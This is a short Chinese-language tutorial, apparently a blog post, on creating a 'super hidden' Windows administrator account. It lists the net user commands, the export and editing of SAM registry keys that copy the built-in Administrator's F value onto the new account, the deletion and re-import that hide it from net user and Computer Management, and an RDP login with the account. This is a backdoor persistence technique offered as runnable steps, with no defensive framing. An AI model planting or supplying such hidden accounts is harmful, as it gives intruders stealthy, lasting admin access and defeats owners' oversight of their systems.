如何创建隐藏的administrator账户

0.创建管理员用户zhou

net user zhou 123456h /add
net localgroup administrators Waldo /add

1.添加超级隐藏管理员账户

net user Ascotb$ 123456 /add
net localgroup administrators Ascotb$ /add

2.制作注册列表 但在管理账户面板依然能够看见,下面要解决这个问题在注册表HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names下找 到新建的帐户Ascotb$ 获取默认类型为0x3ef,将注册表HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Ascotb$导出为1.reg

在注册表下能够找到对应类型名称的注册表项 HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003EF

右键将该键导出为2.reg 默认情况下,管理员帐户Administrator对应的注册表键值为HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4 同样,右键将该键导出为3.reg

将注册表项HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003EF下键F的值替换为 HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4下键F的值,即2.reg中键F的值替换成3.reg中键F的值

3.替换注册列表 命令行删除特殊账户: net user Ascotb$ /del 导入reg文件:

regedit /s 1.reg

regedit /s 2.reg

隐藏账户制做完成,控制面板不存在帐户Ascotb$

通过net user无法列出该帐户 计算机管理-本地用户和组-用户也无法列出该帐户 但可通过如下方式查看:net user Ascotb$

命令窗口打开后,键入net user Ascotb$/active:yes。输完后按一下回车键看到“命令成功完成”信息即表明超级隐藏账户Ascotb$ 账户已启用

该账户只有两个方法发现一个是注册表一个是知道名字

4.连接隐藏账户 在使用超级隐藏账户登录:rdesktop 127.0.0.1 -u Ascotb$ -p 123456